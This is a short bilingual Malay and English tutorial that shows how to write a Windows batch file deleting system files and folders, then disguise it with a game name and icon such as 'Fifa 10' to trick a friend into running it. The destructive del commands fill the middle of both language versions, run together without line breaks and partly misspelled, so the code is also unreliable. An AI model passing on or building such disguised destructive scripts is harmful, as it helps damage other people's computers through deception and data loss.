Di bawah ini merupakan tutorial membuat virus yang boleh men-delete file-file system di dalam PC/Laptop anda. Jadi segala tutorial di bawah ini tidak di tanggung oleh pihak kami. Harap maklum. Jika anda ingin mempelajari juga, sebaiknya janganlah men-click ataupun haruslah running di VMWareterlebih dahulu.
CARA - CARA :1) Buka Notepad.
2) Copy code di bawah :
@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"
3) Paste dalam Notepad.
4) Save As kepada fileanda.bat . Jadikan Save As Type: kepada All Files. Namakan fileanda diikuti dengan 2 digit nombor. Contoh, Fifa 10.bat
Tukar Icon File (Step ini nak buat tak apa, tak mahu buat pun tak apa)
5) Click kanan pada fileanda.bat > Create Shortcut . Terbina satu lagi fileanda di desktop.
6) Click kanan > Properties > Change Icon > tukarlah kepada icon mana yang anda mahu. Contoh saya menukarnya kepada icon Fifa 10.
This is a tutorial on how to make a virus that can delete files in your/others system in yours/theirs PC or laptop.So,if anything happens please don't blame us,you've been warned.It's better if you don't click anything.You can run VMW first if you REALLY want to test it by yourself.
1) Open up Notepad.
2) Copy these codes :
@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"
3) Paste on Notepad
4) Save as a .bat extension (eg; poops.bat) Remember to choose ALL FILES and your file must be followed by two digits (final eg; poops 12.bat)
5)You can change the icon if you want(troll a friend)
How to change it?
Right click on poops12.bat > Create Shortcut and a file appears on your desktop.
Right click on the virus you made (DON'T CLICK) > Properties > Change Icon
Change to anything that you want.
Good luck!
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